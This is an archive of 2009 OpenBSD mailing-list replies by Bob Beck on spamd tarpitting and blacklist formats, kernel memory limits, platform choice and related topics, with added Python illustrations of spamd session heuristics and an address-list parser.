 In the absence of any feedback, I would say that I have two feature
 requests for spamd (Bob, are you out there?):

  1) Detect '500 5.5.1 Command unrecognized' loops, and when found,
 start to gap response times with an increasing delay.

  2) When a client does not wait for spamd's 220 opening message to
 complete before sending, greytrap that client.

I'll take a look at both.

-Bob



 Thanks for your consideration.

 - Tor


 On Sat, Jan 02, 2010 at 03:15:03PM -0800, open...@noid.net wrote:
 Hello,

 I've got spamd working well (it's very cool!)...

 Sometimes I see in pftop a state entry that shows spamd has a very old
 connection that is actively still passing traffic (lasts for hours)...

 I was able to capture one of these as it began (using tcpdump).
 Here's what the trace shows (in distilled SMTP):

   send: 220 my
   recv: EHLO bogon.domain.com\r\n
   send:   host.domain.net ESMTP MTA; Mon Dec 28 07:55:59 2009\r\n
   send: 250 Hello, spam sender. Pleased to be wasting your time.\r\n
   recv: HELO bogon.domain.com\r\n
   send: 500 5.5.1 Command unrecognized\r\n
   recv: \r\n
   send: 500 5.5.1 Command unrecognized\r\n
   recv: \r\n
   send: 500 5.5.1 Command unrecognized\r\n
   recv: \r\n

   ... etc, approximately two 5.5.1 errors per second

 This client sends its EHLO before waiting for spamd to complete
 sending its 220 opening message.  I try to show that above using an
 indentation on the third line (the second send line).  In fact, spamd
 is doing its normal trick of stuttering out the 220 opening message
 one char per packet...

 I think spamd's state table is correct in not allowing the SMTP
 session to reset upon receiving the subsequent HELO.  My questions
 are as follows:

 Should spamd start to reduce bandwidth for a session by extending
 reply times after some trigger like too many errors sent or too much
 time spent...?

 When a client sends its EHLO (or anything at all) before waiting for
 the server's 220 opening message to complete, is that not grounds for
 immediate greytrapping?  I do not think spamd enforces that at the
 moment.  This would be similar to sendmail's FEATURE(`greet_pause') in
 that there would be a penalty for such misbehavior...

 Thanks for your consideration.

 - Tor
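As an added illustration of the two heuristics requested above (this is constructed example code, not spamd's source), the following Python replays a session trace and applies both rules: a client that sends anything before the stuttered 220 banner has finished is flagged as an early talker, and a session that keeps drawing "500 5.5.1" replies accumulates an escalating delay. The trace format, the `threshold`, `base_delay` and `factor` parameters and the verdict names are assumptions made for this example; the sample traces are constructed from the distilled SMTP exchange quoted above.

```python
"""Constructed model of two tarpit heuristics: early-talker detection and
an escalating delay for '500 5.5.1' loops. Not spamd code; the event
format and the policy parameters below are assumptions for this example.
"""
from dataclasses import dataclass


@dataclass
class Verdict:
    early_talker: bool   # client spoke before the 220 banner was complete
    unrecognized: int    # number of '500 5.5.1' replies the server sent
    added_delay: float   # seconds of extra stalling the policy would add
    action: str          # 'greytrap', 'slow' or 'ok'


def analyze_session(events, threshold=2, base_delay=1.0, factor=2.0,
                    max_delay=60.0):
    """Replay a session trace and decide how the tarpit should react.

    events: list of (who, text) in wire order, who = 'S' (server) or
    'C' (client). The banner may be split over several 'S' chunks, as a
    stuttered greeting is; it counts as complete once a CRLF has gone out.
    """
    banner = ""
    banner_done = False
    early_talker = False
    unrecognized = 0
    added_delay = 0.0

    for who, text in events:
        if who == "S":
            if not banner_done:
                banner += text
                if "\r\n" in banner:
                    banner_done = True
            elif text.startswith("500 5.5.1"):
                unrecognized += 1
                # The first `threshold` errors cost nothing extra; each
                # further one multiplies the stall, capped at max_delay.
                excess = unrecognized - threshold
                if excess > 0:
                    added_delay += min(max_delay,
                                       base_delay * factor ** (excess - 1))
        elif who == "C" and not banner_done:
            # Client data before the greeting is complete: the behaviour
            # sendmail's greet_pause penalises.
            early_talker = True

    if early_talker:
        action = "greytrap"
    elif unrecognized > threshold:
        action = "slow"
    else:
        action = "ok"
    return Verdict(early_talker, unrecognized, added_delay, action)


# Constructed trace, distilled from the exchange quoted in the thread.
LOOPING_CLIENT = [
    ("S", "220 my"),
    ("C", "EHLO bogon.domain.com\r\n"),
    ("S", "host.domain.net ESMTP MTA; Mon Dec 28 07:55:59 2009\r\n"),
    ("S", "250 Hello, spam sender. Pleased to be wasting your time.\r\n"),
    ("C", "HELO bogon.domain.com\r\n"),
    ("S", "500 5.5.1 Command unrecognized\r\n"),
    ("C", "\r\n"),
    ("S", "500 5.5.1 Command unrecognized\r\n"),
    ("C", "\r\n"),
    ("S", "500 5.5.1 Command unrecognized\r\n"),
    ("C", "\r\n"),
    ("S", "500 5.5.1 Command unrecognized\r\n"),
]

# Constructed trace of a client that waits for the banner to finish.
POLITE_CLIENT = [
    ("S", "220 host.domain.net ESMTP MTA\r\n"),
    ("C", "EHLO mail.example.net\r\n"),
    ("S", "250 Hello\r\n"),
]

if __name__ == "__main__":
    for name, trace in (("looping", LOOPING_CLIENT), ("polite", POLITE_CLIENT)):
        print(name, analyze_session(trace))
```

The model only looks at ordering, not timing; a real stuttered banner takes seconds to send, which is exactly what gives an impatient client room to expose itself. Note that the looping client above is caught by the early-talker rule before the error counter matters at all.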



Re: spamd.conf format

2009-12-23 Thread Bob Beck
2009/12/21 Nick Berg nickb...@gmail.com:
 From the spamd.conf manual:

   The format of the list of addresses is expected to consist of one network
   block or address per line (optionally followed by a space and text that
   is ignored).  Comment lines beginning with # are ignored.  Network blocks
   may be specified in any of the formats as in the following example:

   # CIDR format
   192.168.20.0/24
   # A start - end range
   192.168.21.0 - 192.168.21.255
   # As a single IP address
   192.168.23.1

 Given the condition that an entry followed by a space has the
 remaining text ignored, would that not invalidate the start - end
 range entry?  Should that not get interpreted as:

no. because a range entry is still an entry.


   192.168.21.0 #comment starts here

 On that note, if a space after an entry denotes the start of ignored
 text, will Spamhaus' DROP list http://www.spamhaus.org/drop/drop.lasso
 get parsed correctly, or should that get run through sed to strip out
 everything after a semicolon?  Its format:

   ; Spamhaus DROP List 12/22/09 - (c) 2009 The Spamhaus Project
   110.44.0.0/20 ; SBL74731
   116.199.128.0/19 ; SBL56563
   119.42.144.0/21 ; SBL70035
   120.143.128.0/21 ; SBL67396
   121.46.64.0/18 ; SBL72673
   128.168.0.0/16 ; SBL51908

that first line with the semicolon list will not parse.
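To make the parsing rules concrete, here is an added example (constructed for this page, not spamd's own parser) that reads a blacklist file by the spamd.conf rules quoted above: one entry per line as CIDR, "start - end" range or single address, anything after the entry ignored, "#" lines skipped. It also shows why the Spamhaus header line is rejected while the ";"-commented entries still load, and a small rewrite step equivalent to the sed pass Nick asks about. The function names, the use of Python's `ipaddress` module and the sample DROP lines are assumptions for this example.

```python
"""Constructed parser for the spamd.conf(5) address-list format.
Not spamd's code: uses the ipaddress module and collapses ranges into
CIDR blocks, which is handy when auditing a list before loading it.
"""
import ipaddress
import re

# 'start - end' with optional spaces around the dash. Checked before the
# single-token case because a range entry itself contains spaces.
RANGE_RE = re.compile(r"^(\S+)\s*-\s*(\S+)")


def parse_address_list(text):
    """Return (networks, rejected).

    networks: ipaddress network objects in file order.
    rejected: (line number, raw line) for lines that do not parse; spamd
    would not understand these either.
    """
    networks, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            m = RANGE_RE.match(line)
            if m:
                lo = ipaddress.ip_address(m.group(1))
                hi = ipaddress.ip_address(m.group(2))
                networks.extend(ipaddress.summarize_address_range(lo, hi))
            else:
                # Only the first token counts; the rest is ignored text.
                networks.append(ipaddress.ip_network(line.split()[0],
                                                     strict=False))
        except ValueError:
            rejected.append((lineno, raw))
    return networks, rejected


def semicolon_comments_to_hash(text):
    """Rewrite ';'-style comments (Spamhaus DROP list style) into the '#'
    form spamd ignores; the equivalent of a sed pass over the file."""
    out = []
    for line in text.splitlines():
        stripped = line.lstrip()
        if stripped.startswith(";"):
            out.append("#" + stripped[1:])
        else:
            out.append(line.replace(";", "#", 1))
    return "\n".join(out)


# The example list from spamd.conf(5), as quoted in the thread.
SPAMD_EXAMPLE = """\
# CIDR format
192.168.20.0/24
# A start - end range
192.168.21.0 - 192.168.21.255
# As a single IP address
192.168.23.1
"""

# Constructed sample in the Spamhaus DROP list format quoted in the thread.
DROP_SAMPLE = """\
; Spamhaus DROP List 12/22/09 - (c) 2009 The Spamhaus Project
110.44.0.0/20 ; SBL74731
116.199.128.0/19 ; SBL56563
119.42.144.0/21 ; SBL70035
120.143.128.0/21 ; SBL67396
121.46.64.0/18 ; SBL72673
128.168.0.0/16 ; SBL51908
"""

if __name__ == "__main__":
    nets, bad = parse_address_list(SPAMD_EXAMPLE)
    print([str(n) for n in nets], bad)
    nets, bad = parse_address_list(DROP_SAMPLE)
    print(len(nets), "entries,", len(bad), "rejected:", bad)
    nets, bad = parse_address_list(semicolon_comments_to_hash(DROP_SAMPLE))
    print(len(nets), "entries,", len(bad), "rejected")
```

Run against the DROP sample, the six CIDR lines load because only the first token is examined and the ";" text after it is ignored; only the header line, whose first token is ";", is rejected, which matches the answer above. Rewriting the comments first gives a file with nothing rejected.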



Re: Web Browsers

2009-12-18 Thread Bob Beck
2009/12/18 nixlists nixmli...@gmail.com:
 On Fri, Dec 18, 2009 at 9:07 PM, Marco Peereboom sl...@peereboom.us wrote:
 firefox + adsuck

 What is your opinion on Chrome, OpenBSD gurus? Okay we all know about
 its privacy and identity leakage concerns. It's designed by Google
 with this built-in - they want to know everything about you and don't
 care about your privacy, yada yada. But what about its supposedly more
 secure multi-process design. Is it really better than Firefox and
 others in this regard?



Well, in theory, if they can stick to it, a privsep design is more
secure from the point of view of the application.

When done right.

Now, is it a small and secure program? I dunno: You decide:



# uname -a
OpenBSD cthulhu.cns.ualberta.ca 4.6 GENERIC.MP#27 amd64
# pwd
/usr/local/chrome
# ldd chrome
chrome:
StartEnd  Type Open Ref GrpRef Name
0040 02c9f000 exe  10   0  chrome
000209b99000 00020a0cc000 rlib 014   0
/usr/X11R6/lib/libX11.so.12.0
000210dbf000 0002111c8000 rlib 07   0
/usr/X11R6/lib/libXrender.so.5.0
0002069ca000 000206ddb000 rlib 07   0
/usr/X11R6/lib/libXext.so.10.0
000212468000 000212877000 rlib 01   0
/usr/local/lib/libexecinfo.so.0.0
00021037f000 000210bab000 rlib 01   0
/usr/local/lib/libgtk-x11-2.0.so.1402.0
0002111f4000 0002116aa000 rlib 02   0
/usr/local/lib/libgdk-x11-2.0.so.1402.0
000214671000 000214a8c000 rlib 03   0
/usr/local/lib/libgdk_pixbuf-2.0.so.1402.0
00020449 00020489d000 rlib 03   0
/usr/local/lib/libpangocairo-1.0.so.1801.0
00020a66 00020aa62000 rlib 03   0
/usr/X11R6/lib/libXinerama.so.5.0
00020ff75000 00021037f000 rlib 03   0
/usr/X11R6/lib/libXi.so.10.1
0002058fc000 000205d04000 rlib 03   0
/usr/X11R6/lib/libXrandr.so.6.1
00020db06000 00020df1 rlib 03   0
/usr/X11R6/lib/libXcursor.so.4.0
0002029e5000 000202de8000 rlib 03   0
/usr/X11R6/lib/libXcomposite.so.3.0
000202e4d000 00020325 rlib 03   0
/usr/X11R6/lib/libXdamage.so.3.1
0002065c 0002069c5000 rlib 06   0
/usr/X11R6/lib/libXfixes.so.5.0
000211fc2000 0002123e rlib 02   0
/usr/local/lib/libatk-1.0.so.2800.0
00020ce25000 00020d2b rlib 04   0
/usr/local/lib/libcairo.so.9.2
000213dfc000 000214236000 rlib 05   0
/usr/X11R6/lib/libpixman-1.so.15.8
00020976e000 000209b99000 rlib 05   0
/usr/local/lib/libglitz.so.2.0
00020df1 00020e338000 rlib 01   0
/usr/local/lib/libpng.so.9.0
00020efb6000 00020f3d2000 rlib 015   0
/usr/X11R6/lib/libxcb.so.2.0
000205d04000 000206105000 rlib 016   0
/usr/X11R6/lib/libpthread-stubs.so.0.0
00020d532000 00020d935000 rlib 016   0
/usr/X11R6/lib/libXau.so.9.0
0002130c2000 0002134c7000 rlib 016   0
/usr/X11R6/lib/libXdmcp.so.10.0
000207434000 0002078e1000 rlib 04   0
/usr/local/lib/libgio-2.0.so.1802.0
0002156c4000 000215af4000 rlib 04   0
/usr/local/lib/libpangoft2-1.0.so.1801.0
000204a99000 000204ee3000 rlib 05   0
/usr/local/lib/libpango-1.0.so.1801.0
00020610a000 00020654a000 rlib 012   0
/usr/local/lib/libgobject-2.0.so.1802.0
   00020c7da000 00020cbdd000 rlib 010   0
/usr/local/lib/libgmodule-2.0.so.1802.0
00020eb7a000 00020efb1000 rlib 06   0
/usr/X11R6/lib/libfontconfig.so.6.0
000204ee3000 000205307000 rlib 07   0
/usr/lib/libexpat.so.9.0
000209038000 0002094ba000 rlib 07   0
/usr/X11R6/lib/libfreetype.so.17.0
000214a8c000 000214ea rlib 08   0
/usr/lib/libz.so.4.1
0002079f7000 000207dfb000 rlib 03   0
/usr/local/lib/libgthread-2.0.so.1802.0
00020fa0e000 00020fed7000 rlib 015   0
/usr/local/lib/libglib-2.0.so.1802.0
000203e02000 00020420d000 rlib 016   0
/usr/local/lib/libintl.so.4.0
00020326b000 000203764000 rlib 017   0
/usr/local/lib/libiconv.so.6.0
00020b96a000 00020bea5000 rlib 03   0
/usr/local/lib/libnss3.so.24.0
000212c95000 0002130c2000 rlib 01   0
/usr/local/lib/libsmime3.so.24.0
0002116aa000 000211af rlib 01   0
/usr/local/lib/libsoftokn3.so.24.0
00020e73c000 00020eb75000 rlib 01   0
/usr/local/lib/libssl3.so.24.0
0002152c1000 0002156c4000 rlib 06   0
/usr/local/lib/libplds4.so.21.0
00020e338000 00020e73c000 rlib 06   0
/usr/local/lib/libplc4.so.21.0
000206de 000207219000 rlib 08   0

Re: OT: Have you hugged your local OpenBSD dev lately?

2009-12-14 Thread Bob Beck
 From past experience, I would expect much waving of hands over a two
 weeks periods, with lots of expert telling you It's a complicated problem,
 running around in circle finding even MORE complicated problems to solve,
 and then things going back to its general state of apathy with respect
 to security issues.

I don't believe it's apathy, as much as a realization that in general,
the focus of the developers will always be on speed and eye candy to
the expense of all else, including stability and security.

As such we concentrate on looking at things that can mitigate
somewhat, at least in the saner cases, such as when it is not an
accelerated driver with full access to the machine. Then we at least
have some more secure by default options.

The fact is though, monstrously accelerated X with full access to
the machine hardware bypasses much of the security protection
openbsd provides.  Do some people want/need it? sure. but they should
do so understanding that they are incurring a greater risk by using
it in this manner.



Re: OT: Have you hugged your local OpenBSD dev lately?

2009-12-14 Thread Bob Beck
 The Journal Of Child Psychology And Psychiatry has concluded that an
 estimated 98 percent of children under the age of 10 are remorseless
 sociopaths with little regard for anything other than their own egocentric
 interests and pleasures.

 http://www.theonion.com/content/news/new_study_reveals_most_children

 I just don't think in this case here that it is limited to Children only.
 (;

The people who publish such research, and those that read it and find
it novel have obviously never been parents themselves, or even
someone's boss.

People are at the core motivated by their own self-interest.  Anyone
who says they aren't is selling something.



Re: OT: Have you hugged your local OpenBSD dev lately?

2009-12-14 Thread Bob Beck
 | People are at the core motivated by their own self-interest.  Anyone
 | who says they aren't is selling something.

 Yes, they're selling hilarity. It's The Onion, after all.

Yes, but it's funny because it's true.  Even OpenBSD developers are
motivated by self interest...Ever wonder why the answers on misc@ are
so taunting or dismissive for people who whine without producing code?



Re: malloc: out of space in kmem_map

2009-12-14 Thread Bob Beck
2009/12/14 Jeff Ross jr...@openvistas.net:
 Hi all,

 While doing some pgbench runs on a new server before I put in on-line, I
 triggered a malloc: out of space in kmem_map panic.

 trace and ps (long) below, dmesg below that.

 I have adjusted sysctl values like so for postgres:

 # For PostgreSQL Port
 kern.seminfo.semmni=1024
 kern.seminfo.semmns=9082
 kern.shminfo.shmall=128000
 kern.shminfo.shmmax=202800

 I see softdep mentioned in the trace below, so here's /etc/fstab

Doctor doctor.. It hurts when I do this..

Well.. Don't do that!

Your problem is that the kernel has run out of kernel memory.

Those knobs you all cranked up to eleventy billion consume kvm. The
reason they are set to lower limits is to prevent the sort of
situation you have encountered.

When you crank them to eleventy billion, and then start eleventy
billion processes that consume such resources, expect the possibility
of issues.



Re: running openbsd 4.6 under qemu

2009-12-14 Thread Bob Beck
 Current qemu releases (more recent than in the ports tree) do not run on
 OpenBSD (have not been able to solve this yet *sigh*) so the above person has
 Linux running natively and OpenBSD inside a newer qemu.  Originally it was
 kvm that had this bug but looks like qemu is now bug-for-bug compatible with
 this in recent versions of qemu. Whee.

arch=qemu, arch=vmware anyone?

it's not like it's an actual PC :)



Re: Why is getaddrinfo breaking POSIX?

2009-12-11 Thread Bob Beck
2009/12/11 Theo de Raadt dera...@cvs.openbsd.org:
 I did a quick perusal of the source (and compared it against the NetBSD
 tree) and it looks like the easiest way to
 make getaddrinfo() thread safe is to TURN OFF Yellow Pages (pee).

 NetBSD changes the only variable globals to local (in the yp code by
 removing the caching optimization) and puts
 a mutex in the yp code to protect its global variables.

 I would do the work but I can't test it (I have refused to use YP for
 the last 17.5 years).  If someone volunteers to
 test, I'll rework the code.

 It would be silly to turn off YP to solve this.

 It's much like saying that the simplest way to avoid children being
 hurt in car accidents during their teens is to abort them at birth.

 YP is good stuff.  It is going to get us LDAP for nearly free.


Indeed. Far more sane to just make YP thread safe... Then we wouldn't
have to abort anything.

(Won't someone think of the children!)



Re: ComixWall terminated [WAS: ComixWall 4.6 released, December 8, 2009]

2009-12-09 Thread Bob Beck
 COMIXWALL isn't a fork, its just a preinstalled configuration panel
 for OpenBSD and a collection of nice utilities.

 And considering (and no offence here) the COMIXWALL developers are
 enthusiasts not paid professional developers.
 So where's the harm asking some advice?
After all lets face is some of the brightest minds in computer
 security lurk on this list and code for OpenBSD/OpenSSL.

So it belongs as a port then. Not as a distribution - and not
sending release announcements to OpenBSD lists.

Do we see release announcements here for other new ports? Do we see
release announcements on our lists for Firefox?

The point is not whether comixwall is a good thing. While I'll debate
the wisdom of advertising yourself as a separate distribution when
really you are a set of configuration tools, the point is simple:

* Release Announcements For things that are not OpenBSD do not belong
on OpenBSD lists * - We don't tell people who have other ported
applications that run on openbsd to spew every release announcement
over our lists - why should ComixWall be any different?

This should not be difficult to understand.



Re: Free Gorillas

2009-12-08 Thread Bob Beck
2009/12/8 Paige Thompson erra...@devel.ws:
 ftp.openbsd.org got rid of the free gorillas, whats up with that?


According to eminent authority, it's because OpenBSD Developers are
Masturbating Monkeys - not gorillas.



Re: spamd greylisting and 2nd MX question

2009-12-05 Thread Bob Beck
I certainly do not see this behaviour. sounds to me very likely that your
primary is not reachable for some reason and they are trying the secondary.


2009/12/5  inet_use...@samerica.com:
 Hi,

 I am using the -M option of spamd and I am seeing a lot of good servers being
 trapped because they tried the secondary MX first. What I am assuming is
 that they tried the primary MX, which created a greylist entry. But this
 entry expired, and after that, they tried to connect to the 2nd MX.

 If I increase the greyexp value of the -G option (which is the default of 4
 hours), I suppose the greylist entry for these servers will last longer.

 Is there a chance that by doing so I will see less traps for this reason?

 Thanks in advance.

 Regards,

 Jose



Re: asynchronous I/O

2009-12-04 Thread Bob Beck
2009/12/4 Ted Unangst ted.unan...@gmail.com:
 On Fri, Dec 4, 2009 at 10:20 AM, Luis Useche use...@gmail.com wrote:

 Exactly, I am more interested more in something close to aio_read 
 aio_write. I was hoping there was some api I can use. Is there any
 reason why POSIX aio does not exist in OBSD?

 Nobody wrote it.



And:

APPLICATION USAGE

The aio_read() function is part of the Asynchronous Input and
Output option and need not be available on all implementations.



Re: TiVo + ATT/squid + web caching issue.

2009-12-01 Thread Bob Beck
Here's a nickel kid - Get a better ISP.

Fuck people, if you don't vote with your feet when they do this shit
eventually you'll be able to do nothing.


2009/12/1 Christopher Hilton ch...@vindaloo.com:
 I'm having a problem running a TiVo for my mother-in-law. To save some money
 she changed her ISP to ATT. The issue is that ATT is running some sort of
 transparent web cache proxy at the base of their network and the TiVo will not
 load its daily guide data through the cache. ATT also charges for this kind
 of Tech support so getting the caching issue fixed is not an option.

 I'm running my firewall on OpenBSD and my in-laws have a similar firewall
 setup. I have already setup an IPSEC VPN between their house and mine. The
 setup looks like this:


Tivo  [ In laws fw ] --- ( Internet ) --- [ my fw ] --- my net

 The firewall setup is partially for my convenience. I want to seamlessly
 get to my servers when I'm over there for a bit of time. Their default gateway
 sends them to the internet through their ATT connection but can also get to
 things on my network. If the tunnel goes down the internet works fine but they
 cannot see things in my house.

 What I would like to do is arrange for their TiVo to pass all of its traffic
 through the tunnel and out through my firewall since my ISP is a bit easier to
 deal with.

 -- Chris



  There will be an answer, Let it be.
   e: chris -at- vindaloo -dot- com



Re: Security via the NSA?

2009-11-25 Thread Bob Beck
Like everyone verifies SSL.. right?


2009/11/21 Samuel Baldwin recursive.for...@gmail.com:
 2009/11/21 AG computing.acco...@googlemail.com:
 Depends on whether one trusts the NSA or not.

 That's the nice thing about open source software; we don't have to,
 because we can verify their code or mathematics ourselves.

 --
 Samuel Baldwin - logik.li



Re: Spamd china and korea lists

2009-11-25 Thread Bob Beck
We're having issues with them periodically blocking our access to the
site - which has happened since we have a failure.

I have a version of the lists there now, but I think it may actually
be time to retire that example from spamd.conf - those lists
just aren't as useful as they were in past years.


2009/11/24 Rod Whitworth glis...@witworx.com:
 On Tue, 24 Nov 2009 18:55:49 -0800, Jason LaRiviere wrote:

Hello all,

Willing to suffer scorn if I've missed a commit message or previous post on
the matter, but I've been getting a 404 for these two lists since
approximately the `unplanned maintenance' www event of a few weeks ago. Shall
I comment them out of spamd.conf, or will they make their return?

Regards,
Jason.


 A long long time ago we had a similar problem. My solution has stayed
 in place ever since.
 Cobbled up QD but it works.
 script = okean:
 #!/bin/sh
 ftp -o /var/db/china.txt http://www.okean.com/chinacidr.txt
 ftp -o /var/db/korea.txt http://www.okean.com/koreacidr.txt

 crontab entry for okean:
 26  14  *   *   *   /root/bin/okean

 part of spamd.conf:
 ---8<--- snip ---
 # Mirrored from http://www.okean.com/chinacidr.txt
 china:\
:black:\
:msg=SPAM. Your address %A appears to be from China\n\
See http://www.okean.com/asianspamblocks.html for more
 details:\
:method=file:\
:file=/var/db/china.txt:

 # Mirrored from http://www.okean.com/koreacidr.txt
 korea:\
:black:\
:msg=SPAM. Your address %A appears to be from Korea\n\
See http://www.okean.com/asianspamblocks.html for more
 details:\
:method=file:\
:file=/var/db/korea.txt:
 ---8<--- end snip ---

 No more problems since.
 Hints: pick some oddball time for the  cronjob, once a day is fine as
 changes are rare.
 I use a similar technique for nixspam too.

 Good enough for you?
 You're welcome!

 I think that the people running that site don't realise that it is
 better for OpenBSD to mirror it than to have us all hitting it daily
 but you just can't get through to some people.



 *** NOTE *** Please DO NOT CC me. I am subscribed to the list.
 Mail to the sender address that does not originate at the list server is
 tarpitted. The reply-to: address is provided for those who feel compelled to
 reply off list. Thank you.

 Rod/
 ---
 This life is not the real thing.
 It is not even in Beta.
 If it was, then OpenBSD would already have a man page for it.



Re: Authpf and more than 992 users

2009-11-18 Thread Bob Beck
2009/11/18 Janusz Gumkowski janusz.gumkow...@am.torun.pl:

 Is it at all possible to have more than 992 simultaneous authpf users ?



Yes, use more than one machine.

 Digging out an old post of mine, still not having any real solution
 but a couple of ugly hacks instead, trying to get rid of them finally.

 To the point:  is allocating a pty for authpf logins really necessary ?

Yes.

 What side-effects can I expect if I disable it ?

Probably bad things.



Re: OpenBSD platform of choice?

2009-11-12 Thread Bob Beck
i386/amd64.  Nothing else is realistic these days.

Sparc64 is wonderful but is basically legacy - it's great for finding
bugs and I use it for hacking but is not something I run in
production.

All my production gear is i386 or amd64 - with a few exceptions. Yes,
the hardware sucks and the biosen were written by monkeys and have
their fingers in everything making the machine even more stupid.
There are no realistic alternatives. There might have been if Sun
hadn't been so determined to turn itself from a good hardware company
into a company trying to compete in Microsoft's product space (selling
bad bloated software) where they had no hope of doing as well except
in crowds that would buy it because at least it's not Microsoft.


2009/11/9 Daniel Gracia Garallar danie...@electronicagracia.com:
 Hi there!

 Now that I have to change my little server farm and I'm able to choose a new
 platform, I would like to choose wisely.

 It's a matter of fact that Intel x86 is bogus-prone, and after experimenting
 a lot with OpenBSD and listening about the different archs since several
 years ago, I tend to think that most of the developers have a taste for
 Sparc derived machines as being more... predictable. But of course, no
 machine is bug free.

 So thinking about security and stability, what would be your OpenBSD
 platform of choice?

 Keep in mind that in this question price is not a factor. I'm just curious
 about preferences based on CPU features and their implementation on OpenBSD.

 Regards!

 Dani



Re: OpenBSD platform of choice?

2009-11-12 Thread Bob Beck
2009/11/12 Lars Nooden lars.cura...@gmail.com:

 Stupid business decisions aside, you can get if you try Sparc from Sun
 or Fujitsu for server work

Kind of, but I don't really think it's got a future. It's kind of like
advocating necrophilia with a fresh corpse.. or maybe just doing it
with a really hot coma patient.  It might be really good for a short
time but you know there isn't much potential there for a long term
relationship.



Re: OpenBSD platform of choice?

2009-11-12 Thread Bob Beck
2009/11/12 Bob Beck b...@ualberta.ca:

 Kind of, but I don't really think it's got a future. It's kind of like
 advocating necrophilia with a fresh corpse.. or maybe just doing it
 with a really hot coma patient.  It might be really good for a short
 time but you know there isn't much potential there for a long term
 relationship.


Or at least that is, unless you're into the old, messy, and unnatural.
We have people like that..



Re: Truncation Data Loss

2009-11-10 Thread Bob Beck
2009/11/10 Jussi Peltola pe...@pelzi.net:
 On Tue, Nov 10, 2009 at 11:18:57AM -0700, Theo de Raadt wrote:
 If you want to never lose data, you have an option.  Make the filesystem
 synchronous, using the -o sync option.

 If you can't accept the performance hit from that, then please accept
 that all the work done over the ages is only on ensuring metadata-safety
 for a low performance penalty.  It has never been about trying to
 promise file data consistency when that could only be achieved by
 synchronous file data writing.

 And the more or less correct solution to improve the performance is
 battery backed RAID write cache, but it's no silver bullet.



 Other than it will still blow goats because it will be bashing
all that data synchronously over the bus.

The best silver bullets are the bullets that just shoot the users that
care either about this, and/or performance. Once you shoot enough of
them performance improves to an acceptable level.



Re: kern.bufcachepercent

2009-11-04 Thread Bob Beck
I don't know what version of plus46.html you are looking at - but that
text doesn't appear in any version I look at.

Of course it is in the cvs commit log, but that's not the same thing.
That same commit was backed out before 4.6 - and has since gone back
into current.

2009/11/4 Luis Useche use...@gmail.com:
 On Tue, Nov 3, 2009 at 11:44 PM, Bob Beck b...@ualberta.ca wrote:
 2009/11/3 Luis Useche use...@gmail.com:


 I read in the 4.6 changelog that his was part of the release.

 Am I missing something? Do I have to recompile? Or this is just a bug?

 Yeah you are missing something. Listen to the *whole* presentation and
 read the *whole* changelog. This is *not* in 4.6

 It is in current.

 OK. Sorry for the noise. In any case, this change is in the 4.6
 changelog (twice, http://www.openbsd.org/plus46.html):



Re: http://www.theregister.co.uk/2009/11/03/linux_kernel_vulnerability/

2009-11-03 Thread Bob Beck
2009/11/3 Gilles Chehade gil...@openbsd.org:
 On Tue, Nov 03, 2009 at 04:58:25PM -0700, Theo de Raadt wrote:
 [bcc'd to Dan Goodin @ theregister]

 If anyone wants a choice quote from me about the recent Linux holes,
 this is what I have to say:

 Linus is too busy thinking about masturbating monkeys, he doesn't
 have time to care about Linux security.


 I was considering offering him this:

 http://www.wellcoolstuff.com/Merchant2/graphics/0001/20-Apr-07-05.jpg

 But couldn't get my hands on one yet ;-)

God damn Gilles.. And you didn't find one to bring to us at a hackathon!

Linus doesn't *deserve* one of those - I thought because I work on
OpenBSD only I do!

I will be deeply offended if Linus gets one of those before OpenBSD
developers do..  Well, the hell with the rest of you.. *I* at least
want one first.. Proudly!  Linus doesn't deserve one 'till he has a
commit in our tree. ;)

-Bob



Re: kern.bufcachepercent

2009-11-03 Thread Bob Beck
2009/11/3 Luis Useche use...@gmail.com:


 I read in the 4.6 changelog that his was part of the release.

 Am I missing something? Do I have to recompile? Or this is just a bug?

Yeah you are missing something. Listen to the *whole* presentation and
read the *whole* changelog. This is *not* in 4.6

It is in current.



Re: Secure way to delete data in hard disc

2009-10-29 Thread Bob Beck
2009/10/28 Noah Pugsley noa...@bendtel.com:
 Can I interest you in a pair of steganograpanties? Or for cooler weather,
 steganograpantaloons?

The problem with steganograpanties is that residual images of my ass
are present *underneath* the panties - therefore if the offending
Germans were to use high technology panty-removing chemicals (like
ethanol) they could actually view the residual data present underneath
the panties!  As assuredly every german who is after my ass will
possess this technology it behooves me to take adequate precautions to
obscure the data... I'm thinking kind of along the lines of the
full-ass Kat-Von-D steganographic ass-stealthing tattoo...



Re: 200g harddisk after newfs = Available 174g?

2009-10-29 Thread Bob Beck
 There are many stupid ideas in other operating systems, I
 don't see why we should be required to implement them.

Yeah, and the discussion of my ass is a more productive discussion
than talking about making df display marketing gigabytes

That'll happen in openbsd right after we switch the default filesystem
to apple hfs, and while we're at it replace the yp code with netinfo
because it's so much better.



Re: privileged instruction fault trap

2009-10-29 Thread Bob Beck
2009/10/29 Roger Schreiter ro...@planinternet.de:

 Today, the system crashed,

.

 kernel: privileged instruction fault trap, code=0
 Stopped at  ip_output +0xb8:
 ddb _

.

 Any helpful hints?


http://www.openbsd.org/cgi-bin/man.cgi?query=crash&apropos=0&sektion=0&manpath=OpenBSD+Current&arch=i386&format=html



Re: PF challenge dealing with HTTPS URL restriction policies.. would it help, other possible solution?

2009-10-29 Thread Bob Beck
apache or other reverse proxy.


2009/10/29 Matthew Young myoung24...@gmail.com:
 Hello,


 I am looking for a way to have an allowed list of SSL enabled sites
 that an end user can browse, but this entirely done on a server level
 with _zero_ configuration on the pc.

 In a dream world, squid would be able to transparently proxy https and
 thus I would create  an allowed list of ssl sites specific to each LAN
 user (based on private IP or MAC) that he/she can access. As we know
 this isn't the case because this breaks SSL.

 Does anybody know a way I can actually accomplish this?

 My Thoughts:
 I thought of a way to then take my list of SSL enabled sites
 (gmail.com for example) and resolve the domain to an IP and then add
 it in a firewall so that X user has
 access to port 443 for only those specific IPs.  However the downside
 to this is that if gmail (or any other site i do this) changes the IP
 (which they will) the firewall rule which is static would need an
 update. Besides, gmail's https hostname resolves to the same IP as
 google.com A records so I would be fiddling with those at the same
 time and thus basically be allowing or disallowing the entire google
 domain when I truly really wanted just an access list of gmail.com.

 Would there be a way to make then some type of sniffer which would
 capture when users try to enter a https site and then somehow create a
 dynamic rule of some kind to let traffic out based on an allowed list?

 There must be a practical way, right guys?

 Thanks

 --Matt



